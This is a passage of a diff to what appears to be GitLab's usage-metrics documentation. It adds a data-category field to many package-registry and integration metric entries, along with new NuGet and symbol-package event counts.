+Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3522,6 +4102,8 @@ A count of Conan packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3534,6 +4116,8 @@ A count of container images that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -3546,6 +4130,8 @@ A count of container images that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -3558,6 +4144,8 @@ A count of container images that have been published Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -3570,6 +4158,8 @@ A count of Debian packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3582,6 +4172,8 @@ A count of Debian packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3594,6 +4186,8 @@ A count of Debian packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -3606,6 +4200,8 @@ A count of packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3618,6 +4214,8 @@ A count of packages that have been deleted using a Deploy Token Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3630,6 +4228,8 @@ A count of packages that have been deleted using a Guest Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3642,6 +4242,8 @@ A count of packages that have been deleted using a logged in user Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3654,6 +4256,8 @@ A count of generic packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3666,6 +4270,8 @@ A count of generic packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3678,6 +4284,8 @@ A count of generic packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3690,6 +4298,8 @@ A count of Go modules that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3702,6 +4312,8 @@ A count of Go modules that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3714,6 +4326,8 @@ A count of Go modules that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3726,6 +4340,22 @@ Total count of pull Helm packages events Group: `group::package` +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_helm_push_package` + +The total count of Helm packages that have been published. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210625095025_package_events_i_package_helm_push_package.yml) + +Group: `group::package` + +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -3738,6 +4368,8 @@ A count of Maven packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3750,6 +4382,8 @@ A count of Maven packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3762,6 +4396,8 @@ A count of Maven packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3774,6 +4410,8 @@ A count of npm packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3786,6 +4424,8 @@ A count of npm packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3798,6 +4438,8 @@ A count of npm packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3810,6 +4452,8 @@ A count of NuGet packages that have been deleted Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3822,10 +4466,26 @@ A count of NuGet packages that have been downloaded Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `counts.package_events_i_package_nuget_pull_symbol_package` + +A count of NuGet symbol packages that have been downloaded from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709191135_package_events_i_package_nuget_pull_symbol_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + ### `counts.package_events_i_package_nuget_push_package` A count of NuGet packages that have been published @@ -3834,10 +4494,26 @@ A count of NuGet packages that have been published Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `counts.package_events_i_package_nuget_push_symbol_package` + +A count of NuGet symbol packages that have been uploaded to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709191829_package_events_i_package_nuget_push_symbol_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + ### `counts.package_events_i_package_pull_package` A count of packages that have been downloaded from the package registry @@ -3846,6 +4522,8 @@ A count of packages that have been downloaded from the package registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3858,6 +4536,8 @@ A count of packages that have been downloaded from the package registry using a Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3870,6 +4550,8 @@ A count of packages that have been downloaded from the package registry by a gue Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3882,10 +4564,68 @@ A count of packages that have been downloaded from the package registry by a use Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `counts.package_events_i_package_pull_symbol_package` + +A count of symbol packages that have been pulled from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709210941_package_events_i_package_pull_symbol_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_symbol_package_by_deploy_token` + +A count of symbol packages that have been pulled with a deploy token from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211058_package_events_i_package_pull_symbol_package_by_deploy_token.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_symbol_package_by_guest` + +A count of symbol packages that have been pulled with by a guest from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211248_package_events_i_package_pull_symbol_package_by_guest.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_pull_symbol_package_by_user` + +A count of symbol packages that have been pulled with by an authenticated user from the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211341_package_events_i_package_pull_symbol_package_by_user.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + ### `counts.package_events_i_package_push_package` A count of packages that have been published to the package registry @@ -3894,6 +4634,8 @@ A count of packages that have been published to the package registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3906,6 +4648,8 @@ A count of packages that have been published to the package registry using a dep Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3918,6 +4662,8 @@ A count of packages that have been published to the package registry by a Guest Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3930,10 +4676,68 @@ A count of packages that have been published to the package registry by a user Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `counts.package_events_i_package_push_symbol_package` + +A count of symbol packages that have been pushed to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211439_package_events_i_package_push_symbol_package.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_symbol_package_by_deploy_token` + +A count of symbol packages that have been pushed with a deploy token to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211636_package_events_i_package_push_symbol_package_by_deploy_token.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_symbol_package_by_guest` + +A count of symbol packages that have been pushed by a guest to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211731_package_events_i_package_push_symbol_package_by_guest.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.package_events_i_package_push_symbol_package_by_user` + +A count of symbol packages that have been pushed by an authenticated user to the package registry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210709211831_package_events_i_package_push_symbol_package_by_user.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + ### `counts.package_events_i_package_pypi_delete_package` A count of Python packages that have been deleted from the package registry @@ -3942,6 +4746,8 @@ A count of Python packages that have been deleted from the package registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3954,6 +4760,8 @@ A count of Python packages that have been downloaded from the package registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3966,6 +4774,8 @@ A count of Python packages that have been published to the package registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3978,6 +4788,8 @@ Total count of RubyGems packages delete events Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -3990,6 +4802,8 @@ Total count of pull RubyGems packages events Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4002,6 +4816,8 @@ Total count of push RubyGems packages events Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4014,6 +4830,8 @@ A count of package tags that have been deleted from the package registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -4026,6 +4844,8 @@ A count of package tags that have been downloaded from the package registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -4038,6 +4858,8 @@ A count of package tags that have been published to the package registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -4050,6 +4872,8 @@ Total count of Terraform Module packages delete events Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4062,6 +4886,8 @@ Total count of pull Terraform Module packages events Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4074,6 +4900,8 @@ Total count of push Terraform Module packages events Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4086,6 +4914,8 @@ The total number of packages published to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4098,6 +4928,8 @@ Total GitLab Pages domains Group: `group::release management` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -4110,6 +4942,8 @@ Count of personal Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4122,6 +4956,8 @@ Count the total number of log views Group: `group::monitor` +Data Category: `Optional` + Status: `removed` Tiers: `free` @@ -4134,6 +4970,8 @@ Count of unique object pool repositories for fork deduplication Group: `group::gitaly` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4146,6 +4984,8 @@ Total visits to /groups/:group/-/analytics/productivity_analytics all time Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4158,6 +4998,8 @@ Total GitLab Managed disabled clusters previously attached to projects Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4170,6 +5012,8 @@ Total GitLab Managed clusters attached to projects Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4182,6 +5026,8 @@ Count of project Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4194,6 +5040,8 @@ Count of Projects created Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4206,6 +5054,8 @@ Count of projects with active integrations for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4218,6 +5068,8 @@ Count of projects with active integrations for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4230,6 +5082,8 @@ Count of projects with active integrations for Bamboo CI Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4242,6 +5096,8 @@ Count of projects with active integrations for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4254,6 +5110,8 @@ Count of projects with active integrations for Buildkite Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4266,6 +5124,8 @@ Count of projects with active integrations for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4278,6 +5138,8 @@ Count of projects with active integrations for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4288,11 +5150,13 @@ Counts of Projects that have incident issues, regardless of status. [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180453_projects_creating_incidents.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts.projects_custom_issue_tracker_active` @@ -4302,6 +5166,8 @@ Count of projects with active integrations for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4314,6 +5180,8 @@ Count of projects with active integrations for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4326,6 +5194,8 @@ Count of projects with active integrations for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4338,6 +5208,8 @@ Count of projects with active integrations for Drone CI Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4350,6 +5222,8 @@ Count of projects with active integrations for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4362,6 +5236,8 @@ Count of projects with active integrations for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4374,6 +5250,8 @@ Count of projects with active integrations for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4386,6 +5264,8 @@ Count of projects with active integrations for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4398,6 +5278,8 @@ Count of projects with active integrations for GitHub Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -4410,6 +5292,8 @@ Count of projects with active integrations for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4422,6 +5306,8 @@ Count of projects with active integrations for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -4434,6 +5320,8 @@ Missing description Group: `group::import` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -4446,6 +5334,8 @@ Count of active projects inheriting integrations for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4458,6 +5348,8 @@ Count of active projects inheriting integrations for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4470,6 +5362,8 @@ Count of active projects inheriting integrations for Bamboo CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4482,6 +5376,8 @@ Count of active projects inheriting integrations for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4494,6 +5390,8 @@ Count of active projects inheriting integrations for Buildkite Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4506,6 +5404,8 @@ Count of active projects inheriting integrations for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4518,6 +5418,8 @@ Count of active projects inheriting integrations for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4530,6 +5432,8 @@ Count of active projects inheriting integrations for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4542,6 +5446,8 @@ Count of active projects inheriting integrations for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4554,6 +5460,8 @@ Count of active projects inheriting integrations for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4566,6 +5474,8 @@ Count of active projects inheriting integrations for Drone CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4578,6 +5488,8 @@ Count of active projects inheriting integrations for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4590,6 +5502,8 @@ Count of active projects inheriting integrations for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4602,6 +5516,8 @@ Count of active projects inheriting integrations for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4614,6 +5530,8 @@ Count of active projects inheriting integrations for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4626,6 +5544,8 @@ Count of active projects inheriting integrations for GitHub Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -4638,6 +5558,8 @@ Count of active projects inheriting integrations for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4650,6 +5572,8 @@ Count of active projects inheriting integrations for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -4662,6 +5586,8 @@ Count of active projects inheriting integrations for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4674,6 +5600,8 @@ Count of active projects inheriting integrations for Jenkins Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4686,6 +5614,8 @@ Count of active projects inheriting integrations for Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4698,6 +5628,8 @@ Count of active projects inheriting integrations for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4710,6 +5642,8 @@ Count of active projects inheriting integrations for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4722,6 +5656,8 @@ Count of active projects inheriting integrations for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4734,6 +5670,8 @@ Count of active projects inheriting integrations for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -4746,6 +5684,8 @@ Count of active projects inheriting integrations for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -4758,6 +5698,8 @@ Count of active projects inheriting integrations for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4770,6 +5712,8 @@ Count of active projects inheriting integrations for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4782,6 +5726,8 @@ Count of active projects inheriting integrations for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4794,6 +5740,8 @@ Count of active projects inheriting integrations for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4806,6 +5754,8 @@ Count of active projects inheriting integrations for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4818,6 +5768,8 @@ Count of active projects inheriting integrations for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4830,6 +5782,8 @@ Count of active projects inheriting integrations for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4842,6 +5796,8 @@ Count of active projects inheriting integrations for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4854,6 +5810,8 @@ Count of active projects inheriting integrations for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4866,6 +5824,8 @@ Count of active projects inheriting integrations for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4878,6 +5838,8 @@ Count of active projects inheriting integrations for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4890,6 +5852,8 @@ Count of active projects inheriting integrations for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4902,6 +5866,8 @@ Count of projects with active integrations for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4914,6 +5880,8 @@ Count of projects with active integrations for Jenkins Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4926,6 +5894,8 @@ Count of projects with active integrations for Jira Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4938,6 +5908,8 @@ Count of active integrations with Jira Cloud (Saas) Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4950,6 +5922,8 @@ Count of active integrations with Jira Cloud (DVCS Connector) Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4962,6 +5936,8 @@ Count of active integrations with Jira Software (DVCS connector) Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4974,6 +5950,8 @@ Total Jira Issue feature enabled Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -4986,6 +5964,8 @@ Count of active integrations with Jira Software (server) Group: `group::ecosystem` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -4998,6 +5978,8 @@ Count of projects with active integrations for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5010,6 +5992,8 @@ Count of projects with active integrations for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5022,6 +6006,8 @@ Count of projects with active integrations for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5034,6 +6020,8 @@ Projects with repository mirroring enabled Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -5046,6 +6034,8 @@ Count of projects with active integrations for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -5058,6 +6048,8 @@ Count of projects with active integrations for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -5070,6 +6062,8 @@ Count of projects with active integrations for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5082,6 +6076,8 @@ Count of projects with active integrations for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5094,6 +6090,8 @@ Count of projects with active integrations for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5106,6 +6104,8 @@ Count of projects with active integrations for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5118,6 +6118,8 @@ Count of projects with active integrations for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5130,6 +6132,8 @@ Count of projects with active integrations for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5142,6 +6146,8 @@ Projects with a GitHub service pipeline enabled Group: `group::continuous_integration` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -5154,6 +6160,8 @@ Count of projects with active integrations for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5166,6 +6174,8 @@ Count of projects with active integrations for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5178,6 +6188,8 @@ Count of projects with active integrations for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5190,6 +6202,8 @@ Count of projects with active integrations for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5202,6 +6216,8 @@ Count of projects with active integrations for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5212,11 +6228,13 @@ Count of projects with alerts created in given time period [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180458_projects_with_alerts_created.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts.projects_with_alerts_service_enabled` @@ -5224,7 +6242,9 @@ Count of projects that have enabled the Alerts service [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180456_projects_with_alerts_service_enabled.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `removed` @@ -5236,11 +6256,13 @@ Count of projects with at least 1 enabled integration [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180500_projects_with_enabled_alert_integrations.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts.projects_with_error_tracking_enabled` @@ -5248,7 +6270,9 @@ Count of projects that have enabled Error tracking via Sentry [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180454_projects_with_error_tracking_enabled.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` @@ -5262,6 +6286,8 @@ The number of projects with cleanup policy for tags turned off Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ 